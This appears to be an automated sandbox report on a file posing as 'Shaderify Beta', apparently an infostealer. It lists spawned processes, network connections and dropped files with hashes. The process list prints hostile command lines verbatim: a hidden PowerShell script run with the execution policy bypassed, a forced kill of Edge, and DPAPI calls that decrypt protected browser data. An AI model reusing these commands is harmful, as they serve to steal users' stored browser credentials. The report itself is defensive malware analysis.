"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6336 /prefetch:8

C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe

"C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"

C:\Windows\system32\taskkill.exe

taskkill /IM msedge.exe /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES126A.tmp" "c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\CSCAF1169F8BF2242AC91B3FE317EABC15.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,185,159,240,208,13,156,200,108,45,135,44,176,129,143,6,115,14,150,227,249,148,119,234,116,224,96,29,33,212,104,170,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,95,10,239,172,143,134,225,162,41,152,60,176,145,157,35,118,85,217,123,128,194,204,191,246,204,30,108,18,131,213,178,48,0,0,0,127,128,168,71,40,89,247,46,1,166,118,221,191,145,234,30,1,173,118,77,148,5,64,204,5,235,188,34,174,228,186,249,225,87,140,219,90,44,25,69,248,236,74,84,159,90,146,253,64,0,0,0,255,43,126,128,18,187,23,87,25,160,186,243,225,123,94,103,184,180,189,79,200,113,208,201,114,58,128,110,14,174,4,115,249,90,142,62,150,176,21,218,23,28,117,251,7,185,115,7,217,115,159,146,236,149,160,78,38,8,75,41,190,8,222,156), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,185,159,240,208,13,156,200,108,45,135,44,176,129,143,6,115,14,150,227,249,148,119,234,116,224,96,29,33,212,104,170,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,95,10,239,172,143,134,225,162,41,152,60,176,145,157,35,118,85,217,123,128,194,204,191,246,204,30,108,18,131,213,178,48,0,0,0,127,128,168,71,40,89,247,46,1,166,118,221,191,145,234,30,1,173,118,77,148,5,64,204,5,235,188,34,174,228,186,249,225,87,140,219,90,44,25,69,248,236,74,84,159,90,146,253,64,0,0,0,255,43,126,128,18,187,23,87,25,160,186,243,225,123,94,103,184,180,189,79,200,113,208,201,114,58,128,110,14,174,4,115,249,90,142,62,150,176,21,218,23,28,117,251,7,185,115,7,217,115,159,146,236,149,160,78,38,8,75,41,190,8,222,156), $null, 'CurrentUser')

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,72,74,85,44,248,76,68,49,103,162,228,250,242,83,82,51,252,24,92,38,111,104,163,243,235,206,127,88,242,189,109,186,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,87,82,2,141,244,106,63,178,130,111,104,228,69,207,202,65,179,128,156,25,207,211,233,132,80,111,2,141,196,200,106,86,48,0,0,0,98,131,237,178,109,22,198,30,209,12,59,184,185,159,92,60,59,236,242,130,114,252,125,204,251,45,82,234,111,191,27,49,213,187,112,111,112,226,9,165,227,240,218,144,37,237,226,214,64,0,0,0,219,222,91,108,212,127,234,42,150,35,92,108,29,46,211,39,201,117,243,92,206,11,63,11,145,79,73,227,19,108,24,126,187,180,172,30,116,33,82,173,133,226,135,54,156,107,222,182,239,239,19,106,28,141,48,24,179,105,191,18,212,93,1,36), $null, 'CurrentUser')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,72,74,85,44,248,76,68,49,103,162,228,250,242,83,82,51,252,24,92,38,111,104,163,243,235,206,127,88,242,189,109,186,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,87,82,2,141,244,106,63,178,130,111,104,228,69,207,202,65,179,128,156,25,207,211,233,132,80,111,2,141,196,200,106,86,48,0,0,0,98,131,237,178,109,22,198,30,209,12,59,184,185,159,92,60,59,236,242,130,114,252,125,204,251,45,82,234,111,191,27,49,213,187,112,111,112,226,9,165,227,240,218,144,37,237,226,214,64,0,0,0,219,222,91,108,212,127,234,42,150,35,92,108,29,46,211,39,201,117,243,92,206,11,63,11,145,79,73,227,19,108,24,126,187,180,172,30,116,33,82,173,133,226,135,54,156,107,222,182,239,239,19,106,28,141,48,24,179,105,191,18,212,93,1,36), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1872,10900538933876623952,4256326968210812408,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe

"C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,10900538933876623952,4256326968210812408,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2208 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 185.199.111.154:443 github.githubassets.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 154.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 21.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
US 185.199.111.154:443 github.githubassets.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 shaderify.xyz udp
US 8.8.8.8:53 ipapi.co udp
US 104.26.9.44:443 ipapi.co tcp
US 104.21.62.38:443 shaderify.xyz tcp
US 104.21.62.38:443 shaderify.xyz tcp
US 104.21.62.38:443 shaderify.xyz tcp
US 104.21.62.38:443 shaderify.xyz tcp
US 104.21.62.38:443 shaderify.xyz tcp
US 8.8.8.8:53 44.9.26.104.in-addr.arpa udp
US 8.8.8.8:53 38.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 8b167567021ccb1a9fdf073fa9112ef0
SHA1 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA256 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54

\??\pipe\LOCAL\crashpad_4852_TNUTAIDSMBKCCJWM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 537815e7cc5c694912ac0308147852e4
SHA1 2ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256 b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA512 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 84c90da71ee6640fc379beb4a8f9e491
SHA1 2058536acde71071b042d167e7abb3d9356bb801
SHA256 dc500dc4946201942d67a5e91f16ff5c8a08a911415002819e14ffb3ce5b41a8
SHA512 d56dbab3d76151ad7d9f3804cd2a2aec50e7d65c50e595303debf923eefe6f1c507e863b51f319d88828daa2894925fc8c6ae2c88a6b2ff06c5bba67e70eb486

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2720eb240c9ac8d245331bce525c8d8f
SHA1 702b2de1bac8d71452b5e26554611675022f43b4
SHA256 51d01096034bfe3540c705f6c4f8335916301ed09da8cf928f1780e87e13081c
SHA512 4ac13602b981a9831bbc7fa78255015ab25dace7840294516b834624b4a5b6d54579d3ac52463118e6a498231dbe2a358cad188a6376187c1674e2e5e338b9b9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 45f6cac8b924fcd22271f385e4340e12
SHA1 de611e84d1a3a04bd5764689e66921148015729d
SHA256 64d4e92f419145d26ca8c85553b33e79fc4cadac5495091425e829ff8bdf2349
SHA512 715e539f206b280b3e1b4cf8d90547f31a13f9cdbadb555303c5c51ccb5978e4dd14f4812331404f34f7f224ceb320d17f233f2a0dd06a7e311bf020993fefdf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 dc1047ff48837d1e4d98956e91ceecd3
SHA1 2791986a126874f03d44f238cada061cde3d3301
SHA256 b727f3c52f66657160ca3baedc1416733e3e234956210474136e5902d9a5a42e
SHA512 d1547232734272605fbce9016f52df30e9933d4b768b4af6e1eef6113b4173a5e0e3a87c897bc1f87b3eea62a9c26d978c7031a07b22eeecffb4c9d6d540429f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe578c52.TMP

MD5 08c29a93c52a2c9d32186d5fbace80d2
SHA1 a62f92315d7c50552cfc4b0d46e30f0df40f6908
SHA256 3a4898ab01ac79e217e556111e6e4bc61d0b24c7c7539fb2815e2c292b19a1e8
SHA512 af2fe9791efc5e171284703e17e81a965e14fcf4b4fc324e398acd0bac5905b5c52f86558d2ff80b5457c774a577582004b3ef859cfd37a44d5494fab5984db9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 4c9c11caab0eaca4889e0dd846f57c8d
SHA1 4a113a7284b5756d52ceebfc2efc240d67554e9e
SHA256 a642e559b02631d87dfce692e9aaccd95819caed117f1189075e19c2aa3512b9
SHA512 90ad83580e5aaf48c97b964a7eb0bd45cbff2005226da2f3c7ef791bddd451ae2f19f2e1f930f6be86cb89d593d0d801277965c4ab1a709ea9ea507d7c8602d6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\19b92e1a-15d2-4c13-b8b5-71d1523d3694\0

MD5 30811a867714798da9920e671f74e2fe
SHA1 e70fd100fa7c33ad53346e2df29e640009736144
SHA256 04550d54fdf7e6cda6c3bc912af8e1a21469d0b1a8fe19e399ab2a10271340ba
SHA512 0a993b52317d9902e82e54984f1077dfd45ec4f526b308e83f1be71ca6d4e18cdf30e033a9bdde1dbae681551058649bfcd35825ffc79df0c540a4ca9c8a39cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 1dce74c7b382d0b00137451d289d6bdf
SHA1 0b93140a1e70aa296dd9bff1c2e5ba8ee88b6e59
SHA256 2c6007d9db0d804f185ef27b22ab7f5e3f9ab4bf783b73b16054f11787be1857
SHA512 d7220649ac1fa4d4ed34c90ac3ff879c67ce82609dab97b1bfc3f7a8917200c7e1a4e7d0e4755d30ed0dbe5225ad368ec54b4db555fd68285f5bdafae71f9bc1

C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\System.dll

MD5 75ed96254fbf894e42058062b4b4f0d1
SHA1 996503f1383b49021eb3427bc28d13b5bbd11977
SHA256 a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7
SHA512 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4

C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\nsis7z.dll

MD5 c6a070b3e68b292bb0efc9b26e85e9cc
SHA1 5a922b96eda6595a68fd0a9051236162ff2e2ada
SHA256 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b
SHA512 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3f9a367beb8981981644e8d1615bf4e5
SHA1 2db23a40ec0b63c0c1e5a76e05e1c611a1216ff8
SHA256 0237e2b34453ca4b8623cae9910da211c3c16edd758cd1f67f60f82b49146995
SHA512 8c91254f5ea723bcd26e73289b9d6aecaf998b6f65faf795b10c905a95740bdf6ada41c096defffee9db791360ee2c64c4b98e4755a90e5e15e9c9d8a3194367

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dd4d0343465c2cdb7fa3db2249ae5e18
SHA1 6dde3f88ac91e153699652bebe5b0297c6279443
SHA256 549c8702c94c7fb6a6750b085f83eb168bc58d9f74823f7d2ca7254a25e8e4ee
SHA512 2bfd70725b7e7937b2eec1513c96f9ffe71b1f600a834d1b1189f6f5c1498787a2eb55048279ec3ff98b83ab47bb94b0776d3d26a17a822f3c3a216f5b35e040

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0311113cf4da7fb8eb02b152dea4f42d
SHA1 844d371658417343c2bd3bf531389ef34f59d2c8
SHA256 571c3f86c1a2e9348c2d5a912de2adf6a549c651c15db503aac848ac403dd785
SHA512 792fe70589d01e8a46b50261040c12d18121bef1f304dbba06e6b696bb3e123bc03ae89fde25dce7b4ab40d997cc7ed4ed4a2d9aa23b89921bd639b019621966

C:\Users\Admin\AppData\Local\Temp\nsdF30C.tmp\StdUtils.dll

MD5 33b4e69e7835e18b9437623367dd1787
SHA1 53afa03edaf931abdc2d828e5a2c89ad573d926c
SHA256 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae
SHA512 ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ffmpeg.dll

MD5 eabfc10d56cb44a86493cb2f8ca7aab2
SHA1 09d7e87f43527333cd021329d6c2f4e8bd8ddab5
SHA256 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6
SHA512 ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\icudtl.dat

MD5 ad2988770b8cb3281a28783ad833a201
SHA1 94b7586ee187d9b58405485f4c551b55615f11b5
SHA256 df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108
SHA512 f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\v8_context_snapshot.bin

MD5 c2208c06c8ff81bca3c092cc42b8df1b
SHA1 f7b9faa9ba0e72d062f68642a02cc8f3fed49910
SHA256 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3
SHA512 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\resources\app.asar

MD5 9fc83d8c2973e2b71a40fa3d9a645d24
SHA1 e8de86beee4a3373337420922a9e2d03f2006199
SHA256 6ee130d45c67311acd315bb7b1390df04bb0350a879f602f88d91b127334b81c
SHA512 050349ac8cafe1624109f78f7bc4a33a9f8214e02c8e63acac6fade250761513111e1fc3fadc1f0e53703a91ec354522179483b91a382eeab14bbd5b4969867b

C:\Users\Admin\AppData\Local\Temp\322e9e6d-ee25-44ea-bd6f-3d5c628588d3.tmp.node

MD5 56192831a7f808874207ba593f464415
SHA1 e0c18c72a62692d856da1f8988b0bc9c8088d2aa
SHA256 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
SHA512 c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

memory/4240-479-0x0000024DFD230000-0x0000024DFD252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cgtkc5ac.tto.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 52cc110bb3777aa6bba7900630d4eb49
SHA1 3663dc658fd13d407e49781d1a5c2aa203c252fc
SHA256 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6
SHA512 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab

\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.cmdline

MD5 480d73fc203aed5a5a4740ce8d4bcbde
SHA1 d284a70a0ce0d33d8ba95309f70a1e9e5ac61593
SHA256 9d54cf8f0f71b0a8195b69859260cf80a1cc937dfcdced34ff3c44b5441cecac
SHA512 726a0e3da9398cd55429603b690b4c5cf637a88c55febfbec3fd827d85076618966bbc2d26ea6f73561217fd718a09acbddc380aeba08480f16628652d5fddc6

\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\CSCAF1169F8BF2242AC91B3FE317EABC15.TMP

MD5 e181531d342929cb92adc9150c72e665
SHA1 d00eac09b472ca04fe52160e350701d72e145925
SHA256 35d28050d16f66ba0028ee79f4ab9d0e12332f9befb9a451b67c84615c4ea5b5
SHA512 1436ed5148c3eee08f5286f58dc0184c8c6de7af5ac2dc0ddabe9968846ed8721fa1004a386e54c012bcb06e756b53a77063dc189c7d043bc7fdd13f932b8afc

C:\Users\Admin\AppData\Local\Temp\RES126A.tmp

MD5 d5822bb2dedce6a6bf6e7f76b11523c5
SHA1 2eec652e1f421f28d92dfd348e48c8c8f6df3ef4
SHA256 18c55f2b862b825f47269c7897e672af5456a6f3ed7da32c7a86f85e948cad86
SHA512 28c90ba0b45e40d414551eec78ed279dfb6d61c1cf697953eae798c0c45104f8445d4a04db6d3ee877c719637861e57205ad0e4cb57c8c93d3799d10151ba403

C:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.dll

MD5 65b2d9ea704be13dbca6116065899068
SHA1 a778effdec8ea2ebf79ce39145fdf9edca42e2d4
SHA256 48a4ee17570b0a1bbbb0c01c9b2e4e35973a56e5bd0516ef516ee674da679c40
SHA512 7006223d576218615ee6162be058d154045ecfb11be97d71c4f1687accd718ae22049212bd820ebaec877aa091702ec4f5f1da0679f037223f3fc2c5c167b8a9

memory/4240-513-0x0000024DFD1A0000-0x0000024DFD1A8000-memory.dmp

memory/3836-525-0x00000221BEDC0000-0x00000221BEE10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f48896adf9a23882050cdff97f610a7f
SHA1 4c5a610df62834d43f470cae7e851946530e3086
SHA256 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA512 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e86a2f4d6dec82df96431112380a87e6
SHA1 2dc61fae82770528bee4fe5733a8ac3396012e79
SHA256 dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a
SHA512 5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

MD5 aad33910d78c7b9ecd22d016baa5fbb3
SHA1 61a77f78e842640ca1c4aa9c6beb3b9a733f10b1
SHA256 7170cc7b8c0b3ed6319d2aa5c71a725b9d8c102f046a40eefc2a3d90d6cd737c
SHA512 ac6ae459f1c50a56ea7187f016ff7b21931e4cdd1e94bff5af3baeda87052555b24e982315c1fc26bdd6561a3cfb682ff42d5a7a51518c50aca5dd24e51698a0

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\chrome_200_percent.pak

MD5 57c27201e7cd33471da7ec205fe9973c
SHA1 a8e7bce09c4cbdae2797611b2be8aeb5491036f9
SHA256 dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b
SHA512 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\resources.pak

MD5 d13873f6fb051266deb3599b14535806
SHA1 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2
SHA256 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506
SHA512 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939

C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\locales\en-US.pak

MD5 bd8f7b719110342b7cefb16ddd05ec55
SHA1 82a79aeaa1dd4b1464b67053ba1766a4498c13e7
SHA256 d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de
